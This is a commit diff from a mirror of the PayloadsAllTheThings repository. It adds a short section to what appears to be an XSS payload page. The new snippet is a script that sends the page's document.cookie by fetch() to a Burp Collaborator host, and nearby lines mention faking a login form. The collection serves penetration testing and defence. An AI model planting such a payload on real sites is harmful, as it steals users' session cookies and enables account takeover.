mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-12-12 15:49:38 -08:00
AD update CME+DCOM
This commit is contained in:
@@ -90,6 +90,18 @@ fclose($fp);
|
||||
?>
|
||||
```
|
||||
|
||||
### CORS
|
||||
|
||||
```html
|
||||
<script>
|
||||
fetch('https://<SESSION>.burpcollaborator.net', {
|
||||
method: 'POST',
|
||||
mode: 'no-cors',
|
||||
body: document.cookie
|
||||
});
|
||||
</script>
|
||||
```
|
||||
|
||||
### UI redressing
|
||||
|
||||
Leverage the XSS to modify the HTML content of the page in order to display a fake login form.
|
||||
|
||||
Reference in New Issue
Block a user